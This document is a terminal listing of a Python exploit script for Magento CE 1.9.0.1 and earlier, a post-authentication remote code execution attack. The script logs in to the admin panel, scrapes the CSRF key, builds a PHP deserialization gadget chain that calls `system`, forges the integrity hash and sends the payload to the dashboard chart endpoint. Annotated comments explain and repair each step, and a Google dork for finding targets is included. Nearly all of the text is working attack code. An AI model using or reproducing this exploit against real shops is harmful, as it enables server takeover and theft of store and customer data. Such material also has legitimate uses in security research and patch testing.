  1. root@kali:~/Downloads# cat 37811.py
  2. #!/usr/bin/python
  3. # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
  4. # Google Dork: "Powered by Magento"
  5. # Date: 08/18/2015
  6. # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
  7. # Vendor Homepage: http://magento.com/
  8. # Software Link: https://www.magentocommerce.com/download
  9. # Version: 1.9.0.1 and below
  10. # Tested on: Ubuntu 15
  11. # CVE : none
  12.  
import base64
from hashlib import md5
import re
import sys
import urllib

import mechanize
  18.  
  19.  
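def usage():
    """Print the command-line synopsis and exit.

    The script takes exactly two positional arguments: the target URL and
    the single shell command to hand to the PHP function configured below
    (``system`` as shipped).  Exits via ``sys.exit()`` (status 0).
    """
    # sys.argv[0] fills both %s slots; the original left the placeholders
    # unformatted, so the help text printed a literal "%s" instead of the
    # script name.
    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
          % (sys.argv[0], sys.argv[0]))
    sys.exit()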
  23.  
  24.  
# Command-line args: the admin login URL and the one-string command. Anything
# other than exactly two positional arguments prints the synopsis and exits.
if len(sys.argv[1:]) != 2:
    usage()

target, arg = sys.argv[1], sys.argv[2]

# Config.
# This is a post-auth exploit (see the title header): the credentials below
# must be a working Magento admin login on the target. They are placeholders
# to be replaced per engagement, not defaults that will work anywhere.
username = 'ypwq'
password = '123'
# PHP callable that the gadget chain ends up invoking. It receives exactly one
# argument -- the command string -- so only one-argument callables are usable.
php_function = 'system'
# Must be the exact <date> value from the target's app/etc/local.xml: the
# script mixes it into the md5 that accompanies the payload further down, so
# a wrong value presumably makes the target reject the request instead of
# unserializing the payload.
install_date = 'Wed, 08 May 2019 07:23:09 +0000'
  37.  
# PHP object-injection gadget chain, written out as a serialized object graph:
#   Zend_Log -> _writers[0] = Zend_Log_Writer_Mail
#            -> _layout     = Zend_Config_Writer_Yaml
#               with _yamlEncoder = <php_function>
#               and  _config      = Varien_Object { _data = <arg> }
# The premise is that unserializing this on the target ends up calling
# _yamlEncoder with the _data string -- a call_user_func-style pivot (the
# original note called it "call_user_exec"); the code path that triggers it
# lives in Zend/Magento and is not visible here. The "EXTERMINATE" entries in
# _eventsToMail are arbitrary values; "\x00*\x00" is PHP's protected-property
# name prefix, which is why every property name has a 3-byte lead-in.
#
# NOTE: the s:<len> fields must be PHP *byte* lengths. Under Python 2 (this
# script), len() of a sys.argv string is its byte length, which is correct; a
# Python 3 port would count code points and desynchronize the serialized
# string for any non-ASCII argument.
_POP_CHAIN = (
    'O:8:"Zend_Log":1:{'
        's:11:"\x00*\x00_writers";a:2:{'
            'i:0;O:20:"Zend_Log_Writer_Mail":4:{'
                's:16:"\x00*\x00_eventsToMail";a:3:{'
                    'i:0;s:11:"EXTERMINATE";'
                    'i:1;s:12:"EXTERMINATE!";'
                    'i:2;s:15:"EXTERMINATE!!!!";'
                '}'
                's:22:"\x00*\x00_subjectPrependText";N;'
                's:10:"\x00*\x00_layout";O:23:"Zend_Config_Writer_Yaml":3:{'
                    's:15:"\x00*\x00_yamlEncoder";s:%d:"%s";'
                    's:17:"\x00*\x00_loadedSection";N;'
                    's:10:"\x00*\x00_config";O:13:"Varien_Object":1:{'
                        's:8:"\x00*\x00_data";s:%d:"%s";'
                    '}'
                '}'
                's:8:"\x00*\x00_mail";O:9:"Zend_Mail":0:{}'
            '}'
            'i:1;i:2;'
        '}'
    '}'
)
payload = _POP_CHAIN % (len(php_function), php_function, len(arg), arg)
# Setup the mechanize browser and options
# Robots handling is turned off so mechanize does not refuse paths a
# robots.txt would exclude; the proxy line is a leftover for routing traffic
# through a local intercepting proxy on :8080 while debugging.
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)

# NOTE(review): <target> is presumably the admin login page -- the first
# form on it is what gets submitted, and the scraping further down expects
# the admin dashboard in the reply.
request = br.open(target)

# Fill in and submit the login form. The username control is added by hand
# because mechanize apparently did not pick it up from the parsed form (see
# the original note); new_control -> fixup -> assignment is kept in this
# order because fixup() is what makes the new control assignable.
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password

br.method = "POST"
request = br.submit()
content = request.read()  # post-login page, scraped for ajaxBlockUrl / FORM_KEY below
  62.  
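# The post-login page carries the dashboard's AJAX block base URL and the
# FORM_KEY (Magento's per-session CSRF token) needed for the next request.
# A missing match means the login did not land on the admin dashboard (bad
# credentials, wrong URL, or a different page layout); the original called
# .group(1) on None and died with an opaque AttributeError here.
# NOTE(review): both patterns use a greedy (.*) on a single line -- fine for
# the expected one-assignment-per-line JS, but they will overmatch if other
# quoted text follows on the same line.
url = re.search("ajaxBlockUrl = '(.*)'", content)
key = re.search("var FORM_KEY = '(.*)'", content)
if url is None or key is None:
    sys.exit("[-] ajaxBlockUrl / FORM_KEY not found after login; check the target URL and credentials")
url = url.group(1)
key = key.group(1)

# Pull the dashboard's orders-tab block; the chart <img src> inside it points
# at the endpoint the script calls the "tunnel", which is what the payload is
# sent to. The form key is posted so the request passes the CSRF check.
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search(r'src="(.*)\?ga=', request.read())
if tunnel is None:
    sys.exit("[-] no chart (tunnel) URL in the orders block; the dashboard chart may be disabled on this target")
tunnel = tunnel.group(1)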
  71.  
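# The PoC forges the tunnel endpoint's integrity check: "h" is md5 over the
# base64 payload plus the install date taken from app/etc/local.xml (which is
# why install_date has to be exact). The hash is computed over the un-encoded
# base64 string -- the value the server sees once it has decoded the query
# string -- and only the transport copy below is percent-encoded.
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()

# base64 output contains '+', '/' and '=', none of which are safe inside a
# query value ('+' in particular is decoded to a space). The original pasted
# the raw string into the URL and would corrupt any payload whose encoding
# happened to contain '+', so encode it for transport.
exploit = tunnel + '?ga=' + urllib.quote(payload, safe='') + '&h=' + gh

try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    # As written, the PoC only ever printed the body of an error response,
    # which is evidently where it expects the command output. HTTPError has
    # a body; a plain URLError (DNS/connect failure) has no read(), and the
    # original crashed with AttributeError instead of reporting the error.
    body = e.read() if hasattr(e, 'read') else None
    print(body if body else str(e))
else:
    # A 2xx reply was previously discarded in silence; show it so a target
    # that answers normally still yields whatever came back.
    print(request.read())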